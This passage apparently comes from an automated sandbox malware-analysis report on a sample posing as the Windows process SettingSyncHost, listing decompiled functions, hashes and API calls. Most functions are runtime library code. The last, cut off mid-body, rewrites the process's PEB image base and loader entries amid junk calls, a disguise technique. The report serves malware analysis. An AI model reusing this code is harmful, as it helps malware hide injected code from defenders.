Opcode Fuzzy Hash: c79ca0ba114151e22dcd749a2811ef70a0ae0873b2467da5790d5f5d3f025884
Instruction Fuzzy Hash: A551B172E00249AFDF10DFA6EC41ABE77B8FF48710F040429E921EB190EB749904EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F93C21, Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00F93C21(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xfc7040; // 0xbb40e64e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10ed9a0 = _t6;
				 *0x10ed99c = _t22;
				 *0x10ed998 = _t25;
				 *0x10ed994 = _t21;
				 *0x10ed990 = _t27;
				 *0x10ed98c = _t26;
				 *0x10ed9b8 = ss;
				 *0x10ed9ac = cs;
				 *0x10ed988 = ds;
				 *0x10ed984 = es;
				 *0x10ed980 = fs;
				 *0x10ed97c = gs;
				asm("pushfd");
				_pop( *0x10ed9b0);
				 *0x10ed9a4 =  *_t31;
				 *0x10ed9a8 = _v0;
				 *0x10ed9b4 =  &_a4;
				 *0x10ed8f0 = 0x10001;
				 *0x10ed8a4 =  *0x10ed9a8;
				 *0x10ed898 = 0xc0000409;
				 *0x10ed89c = 1;
				_t12 =  *0xfc7040; // 0xbb40e64e
				_v812 = _t12;
				_t13 =  *0xfc7044; // 0x44bf19b1
				_v808 = _t13;
				 *0x10ed8e8 = IsDebuggerPresent();
				_push(1);
				E00FA1C07(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xfbfeb8);
				if( *0x10ed8e8 == 0) {
					_push(1);
					E00FA1C07(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00f93c21
0x00f93c21
0x00f93c21
0x00f93c21
0x00f93c21
0x00f93c21
0x00f93c21
0x00f93c27
0x00f93c29
0x00f93c29
0x00f977de
0x00f977e3
0x00f977e9
0x00f977ef
0x00f977f5
0x00f977fb
0x00f97801
0x00f97808
0x00f9780f
0x00f97816
0x00f9781d
0x00f97824
0x00f9782b
0x00f9782c
0x00f97835
0x00f9783d
0x00f97845
0x00f97850
0x00f9785f
0x00f97864
0x00f9786e
0x00f97878
0x00f9787d
0x00f97883
0x00f97888
0x00f97894
0x00f97899
0x00f9789b
0x00f978a3
0x00f978ae
0x00f978bb
0x00f978bd
0x00f978bf
0x00f978c4
0x00f978d8

APIs

IsDebuggerPresent.KERNEL32 ref: 00F9788E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F978A3
UnhandledExceptionFilter.KERNEL32(00FBFEB8), ref: 00F978AE
GetCurrentProcess.KERNEL32(C0000409), ref: 00F978CA
TerminateProcess.KERNEL32(00000000), ref: 00F978D1

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: dfaf84d3a295f05747e8c2dd6ce1b675283aadd9d3f577d348dd7992b7e1737d
Instruction ID: 899e66efb178b7e826f69d921c76106a06ee296e1ebd0a553777ef440cc48ffe
Opcode Fuzzy Hash: dfaf84d3a295f05747e8c2dd6ce1b675283aadd9d3f577d348dd7992b7e1737d
Instruction Fuzzy Hash: 8B21E3B9816304DFD760EFAAF9466543BF2FB48B11F10101AE48C8F259E77E5580AF15

Uniqueness

Uniqueness Score: -1.00%

Function 00FDE083, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FDE17B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FDE185
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FDE192

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9a9573ae84d44237149b6858a0c8b5ee0e19f8484af6e770a4b6f16e76f923e8
Instruction ID: 235fbe8133b82feffd177a16174f018f3fc364f9b9ec74d2f50aa386727db969
Opcode Fuzzy Hash: 9a9573ae84d44237149b6858a0c8b5ee0e19f8484af6e770a4b6f16e76f923e8
Instruction Fuzzy Hash: 0A31B275A0122C9BCB21EF64DC89B9DBBB8AF08310F5441EAE41CA7250EB749B859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00FE105A, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00FE1059,?,?,?,?,?,00FDE33E), ref: 00FE107C
TerminateProcess.KERNEL32(00000000,?,00FE1059,?,?,?,?,?,00FDE33E), ref: 00FE1083
ExitProcess.KERNEL32 ref: 00FE1095

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c6ce142068a44290708606a98288604e9c93ce20dad82bec39c15d4ab0150dbf
Instruction ID: ba3be443d522c61b072ca705a671aae0b37c78d8498571baa76264d90e07636f
Opcode Fuzzy Hash: c6ce142068a44290708606a98288604e9c93ce20dad82bec39c15d4ab0150dbf
Instruction Fuzzy Hash: 90E0B631401688ABCF216F66DD099693B6DFF80791B444415FA0A86531CB79ED92EA81

Uniqueness

Uniqueness Score: -1.00%

Function 00FE40F0, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0472578c0b215b984978c490097d9856b7071904912d50344a368866e0e2dea7
Instruction ID: 07ff8884b88cf2a81f0f4bdd6a343748b640ee6528c1fb1b023f5ac5dcd22f22
Opcode Fuzzy Hash: 0472578c0b215b984978c490097d9856b7071904912d50344a368866e0e2dea7
Instruction Fuzzy Hash: A6F16F71E012599FDF14CFA9D8806ADBBB1FF88324F15826DE915AB384D731AE01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F95E1E, Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53a5f62f707ed01b8d97939df154576a8aec8014b2ad489555d06422e7a56414
Instruction ID: 8530f430b5feee358bf216297462d56d8dca4004b9d04fe6aa2c193f0a622898
Opcode Fuzzy Hash: 53a5f62f707ed01b8d97939df154576a8aec8014b2ad489555d06422e7a56414
Instruction Fuzzy Hash: DFB11020E2AF444DD723A6388871332B65CAFBB2C5F52D71BFC6670D62FB2184835541

Uniqueness

Uniqueness Score: -1.00%

Function 00FE7204, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE71FF,?,?,00000008,?,?,00FF4D4F,00000000), ref: 00FE7431

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8194003f9badd127e985392ab928f8b6aa2014683208d6478ee26fde854d69ad
Instruction ID: 00dffad0cc9d1e0b4296e0213394b74db94335c401fc5c73d0550f1c2e5887ac
Opcode Fuzzy Hash: 8194003f9badd127e985392ab928f8b6aa2014683208d6478ee26fde854d69ad
Instruction Fuzzy Hash: 4EB17C32614749CFD719DF29C486B657BE0FF44364F258658E89ACF2A1C335E982EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FEDFFA, Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5A10: GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
Part of subcall function 00FE5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

EnumSystemLocalesW.KERNEL32(00FEE120,00000001,00000000,?,-00000050,?,00FEE74E,00000000,?,?,?,00000055,?), ref: 00FEE06C

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ac4988494e9a021fe803fa8eecf12d6ea90b95375ec81c0767f56b38a5828e96
Instruction ID: 59782ad39955228083df04264296d271d75dc5768cd1bda35e1c57d88e471396
Opcode Fuzzy Hash: ac4988494e9a021fe803fa8eecf12d6ea90b95375ec81c0767f56b38a5828e96
Instruction Fuzzy Hash: 84114C376007015FDB189F3AD8916BAB791FF80768B14483DEA4747B40D775B942E740

Uniqueness

Uniqueness Score: -1.00%

Function 00FEE095, Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5A10: GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
Part of subcall function 00FE5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

EnumSystemLocalesW.KERNEL32(00FEE373,00000001,00000000,?,-00000050,?,00FEE712,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FEE0DF

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f506d6d63fe7bd596c48ae718211fb492ebdc368db4e019b9d2999ba8fad679e
Instruction ID: a24101f7fea7c74edef2dd3f9cbcd64d07fe8d4ac33a78365488b786c950ab93
Opcode Fuzzy Hash: f506d6d63fe7bd596c48ae718211fb492ebdc368db4e019b9d2999ba8fad679e
Instruction Fuzzy Hash: 59F046323003445FCB245F3AEC81A7A7B91EF80778B04843DFA464B690D6B59C02E740

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8AF9, Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE3614: EnterCriticalSection.KERNEL32(?,?,00FE0CC4,00000000,01007890,0000000C,00FE0C8B,?,?,00FE5C95,?,?,00FE5BB2,00000001,00000364,00000006), ref: 00FE3623

EnumSystemLocalesW.KERNEL32(00FE8AEC,00000001,01007B30,0000000C,00FE8F17,00000000), ref: 00FE8B31

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: b48e2490727f37a495d9cd4ab456451f34f7f83f711073b4b063d3b850a7419c
Instruction ID: 2dadcab186297137b5d0b5ad19c52112f89896c1a51150bd05e372d82fce0c57
Opcode Fuzzy Hash: b48e2490727f37a495d9cd4ab456451f34f7f83f711073b4b063d3b850a7419c
Instruction Fuzzy Hash: 85F03776B10344EFD711EFA9E802B9D77B0FB04721F00412AE4549B290CBB95941DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00FEDFAF, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5A10: GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
Part of subcall function 00FE5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

EnumSystemLocalesW.KERNEL32(00FEDF08,00000001,00000000,?,?,00FEE770,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00FEDFE6

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2172495e73cd9971f282168eef34ce80822b3ea7d567a010796545af94b03ddd
Instruction ID: df4bf6d91bc311b24e49721e5e0c05e144dcec69b928dc26e233f865a9038cba
Opcode Fuzzy Hash: 2172495e73cd9971f282168eef34ce80822b3ea7d567a010796545af94b03ddd
Instruction Fuzzy Hash: 48F0553630028557CB04EF3AD84566A7F94EFC2B60B060069FA068BA80C675D842E790

Uniqueness

Uniqueness Score: -1.00%

Function 00FE901B, Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FE3125,?,20001004,00000000,00000002,?,?,00FE2732), ref: 00FE904F

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 9a8c0ecb8bf7794379f1abb129e95c826a4da197f4b8340beb304913a1370b0e
Instruction ID: d53793f6fd49b44aa7ddabd7c1d34104baa09f4e5529f2790ca30a72522655eb
Opcode Fuzzy Hash: 9a8c0ecb8bf7794379f1abb129e95c826a4da197f4b8340beb304913a1370b0e
Instruction Fuzzy Hash: 92E04F3250415CBBCF222F62DC08BAE3F1AEF447A0F004011FE0965261DB798962BBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDED5B, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00FDEED7

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: da35cb29aeece45d6fcb613843855d688fed5f340346c263a486c17ad30fd9e1
Instruction ID: d7c1ab6b1e2edaf4919e03b12907712f99a269dfd306776d2a5d9f85d09bf181
Opcode Fuzzy Hash: da35cb29aeece45d6fcb613843855d688fed5f340346c263a486c17ad30fd9e1
Instruction Fuzzy Hash: 3A515B72E0064496DB38BA2888997BE779B5F51310F1C091FE487DF3C2DA15DD48B352

Uniqueness

Uniqueness Score: -1.00%

Function 00FCE5D0, Relevance: .4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2891d507574f22884a32792e7473fdda9dfbaff4ecae843e9ecfd8102ee2f34b
Instruction ID: c389ddcf4c094422fec0d888aa9c6d330a7281d8f78c5afb29fdf41d092544b7
Opcode Fuzzy Hash: 2891d507574f22884a32792e7473fdda9dfbaff4ecae843e9ecfd8102ee2f34b
Instruction Fuzzy Hash: 07E1C132D1011AABCF25DFA8DD42FAEB7B9FF48310F14422EF815A7281D734A9119B91

Uniqueness

Uniqueness Score: -1.00%

Function 00F91FE0, Relevance: .2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00F91FE0(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				intOrPtr _v12;
				intOrPtr* _v24;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _v60;
				void _v256;
				intOrPtr _t99;
				intOrPtr _t102;
				intOrPtr _t107;
				signed int _t110;
				void* _t119;
				void* _t120;
				long long* _t122;
				void* _t123;
				long long* _t124;
				long long* _t126;
				void* _t127;
				long long* _t129;
				long long* _t130;
				long long* _t132;
				long long* _t134;
				long long* _t136;
				long long _t140;
				long long _t141;
				long long _t142;
				long long _t143;
				long long _t144;
				long long _t145;
				long long _t146;
				long long _t147;

				_t110 = __edx;
				memset( &_v256, 0xcccccccc, 0x3f << 2);
				_v36 =  *[fs:0x30];
				_t6 = _a4 + 0x3c; // 0x100
				_v48 = _a4 +  *_t6;
				_t122 = _t120 + 0xc - 8;
				_t140 =  *0xfbbc50;
				 *_t122 = _t140;
				E00F93700(_t110);
				 *_t122 = _t140;
				E00F935B0(_t110);
				 *_t122 = _t140;
				E00F93460(_t110);
				 *_t122 = _t140;
				E00F93340();
				st0 = _t140;
				_t123 = _t122 + 8;
				_t9 = _a4 + 0x3c; // 0x100
				_t99 =  *_t9;
				_t111 = _a8;
				_t12 = _t99 + 0x16; // 0x78ae824
				if(( *(_a8 + _t12) & 0x2000) == 0) {
					 *((intOrPtr*)(_v36 + 8)) = _a4;
				}
				_t124 = _t123 - 8;
				_t141 =  *0xfbbc50;
				 *_t124 = _t141;
				E00F93700(_t111);
				 *_t124 = _t141;
				E00F935B0(_t111);
				 *_t124 = _t141;
				E00F93460(_t111);
				 *_t124 = _t141;
				E00F93340();
				st0 = _t141;
				_v12 =  *((intOrPtr*)(_v36 + 0xc)) + 0x14;
				_t126 = _t124 + 8 - 8;
				_t142 =  *0xfbbc50;
				 *_t126 = _t142;
				E00F93700(_t111);
				 *_t126 = _t142;
				E00F935B0(_t111);
				 *_t126 = _t142;
				E00F93460(_t111);
				 *_t126 = _t142;
				E00F93340();
				st0 = _t142;
				_t127 = _t126 + 8;
				_t102 =  *((intOrPtr*)(_v36 + 0xc));
				_t112 =  *((intOrPtr*)(_t102 + 0x14));
				_v24 =  *((intOrPtr*)(_t102 + 0x14));
				while(1) {
					_t65 = _v24;
					if(_v24 == _v12) {
						break;
					}
					_v60 = _v24 - 8;
					_t129 = _t127 - 8;
					_t143 =  *0xfbbc50;
					 *_t129 = _t143;
					E00F93700(_t112);
					 *_t129 = _t143;
					E00F935B0(_t112);
					 *_t129 = _t143;
					E00F93460(_t112);
					 *_t129 = _t143;
					E00F93340();
					st0 = _t143;
					_t127 = _t129 + 8;
					if( *((intOrPtr*)(_v60 + 0x18)) == _a8) {
						_t130 = _t127 - 8;
						_t144 =  *0xfbbc50;
						 *_t130 = _t144;
						E00F93700(_t112);
						 *_t130 = _t144;
						E00F935B0(_t112);
						 *_t130 = _t144;
						E00F93460(_t112);
						 *_t130 = _t144;
						E00F93340();
						st0 = _t144;
						 *((intOrPtr*)(_v60 + 0x18)) = _a4;
						_t132 = _t130 + 8 - 8;
						_t145 =  *0xfbbc50;
						 *_t132 = _t145;
						E00F93700(_t112);
						 *_t132 = _t145;
						E00F935B0(_t112);
						 *_t132 = _t145;
						E00F93460(_t112);
						 *_t132 = _t145;
						E00F93340();
						st0 = _t145;
						_t113 = _v60;
						 *((intOrPtr*)(_v60 + 0x1c)) = _a4 +  *((intOrPtr*)(_v48 + 0x28));
